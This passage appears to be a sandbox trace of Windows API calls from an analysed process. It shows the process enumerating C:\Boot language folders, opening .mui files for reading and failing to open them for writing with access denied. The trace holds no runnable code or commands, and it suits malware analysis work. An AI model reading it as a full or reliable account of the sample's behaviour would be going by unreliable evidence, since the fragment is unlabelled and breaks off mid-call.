Parameter=0x1086e48, Context=0x0) returned 1 [0070.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.441] AreFileApisANSI () returned 1 [0070.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nl-NL\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nl-NL\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0070.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.441] AreFileApisANSI () returned 1 [0070.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0070.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nl-NL\\memtest.exe.mui") returned 30 [0070.441] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.442] GetFileType (hFile=0x41c) returned 0x1 [0070.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.442] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.442] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.442] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.442] CloseHandle (hObject=0x41c) returned 1 [0070.442] AreFileApisANSI () returned 1 [0070.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nl-NL\\memtest.exe.mui") returned 30 [0070.443] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.443] GetLastError () returned 0x5 [0070.443] GetLastError () returned 0x5 [0070.443] SetLastError (dwErrCode=0x5) [0070.443] GetLastError () returned 0x5 [0070.443] SetLastError (dwErrCode=0x5) [0070.443] GetLastError () returned 0x5 [0070.443] SetLastError (dwErrCode=0x5) [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.443] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓놠")) returned 0 [0070.443] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0070.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0070.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0070.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0070.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.444] AreFileApisANSI () returned 1 [0070.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pl-PL", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pl-PL", lpUsedDefaultChar=0x0) returned 14 [0070.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.444] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0070.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.444] AreFileApisANSI () returned 1 [0070.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0070.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pl-PL") returned 14 [0070.444] CreateFileW (lpFileName="C:\\Boot\\pl-PL" (normalized: "c:\\boot\\pl-pl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.445] GetLastError () returned 0x5 [0070.445] GetLastError () returned 0x5 [0070.445] SetLastError (dwErrCode=0x5) [0070.445] GetLastError () returned 0x5 [0070.445] SetLastError (dwErrCode=0x5) [0070.445] GetLastError () returned 0x5 [0070.445] SetLastError (dwErrCode=0x5) [0070.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.445] AreFileApisANSI () returned 1 [0070.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0070.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pl-PL") returned 14 [0070.445] CreateFileW (lpFileName="C:\\Boot\\pl-PL" (normalized: "c:\\boot\\pl-pl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.445] GetLastError () returned 0x5 [0070.445] GetLastError () returned 0x5 [0070.445] SetLastError (dwErrCode=0x5) [0070.445] GetLastError () returned 0x5 [0070.445] SetLastError (dwErrCode=0x5) [0070.445] GetLastError () returned 0x5 [0070.445] SetLastError (dwErrCode=0x5) [0070.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.446] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.446] FindFirstFileExW (in: lpFileName="C:\\Boot\\pl-PL\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78290 [0070.446] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.446] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0070.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0070.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.447] AreFileApisANSI () returned 1 [0070.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pl-PL\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0070.447] AreFileApisANSI () returned 1 [0070.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53370 [0070.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 30 [0070.447] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.448] GetFileType (hFile=0x41c) returned 0x1 [0070.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.448] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.448] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.448] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.448] CloseHandle (hObject=0x41c) returned 1 [0070.448] AreFileApisANSI () returned 1 [0070.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 30 [0070.449] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.449] GetLastError () returned 0x5 [0070.449] GetLastError () returned 0x5 [0070.449] SetLastError (dwErrCode=0x5) [0070.449] GetLastError () returned 0x5 [0070.449] SetLastError (dwErrCode=0x5) [0070.449] GetLastError () returned 0x5 [0070.449] SetLastError (dwErrCode=0x5) [0070.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.449] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.450] HeapFree 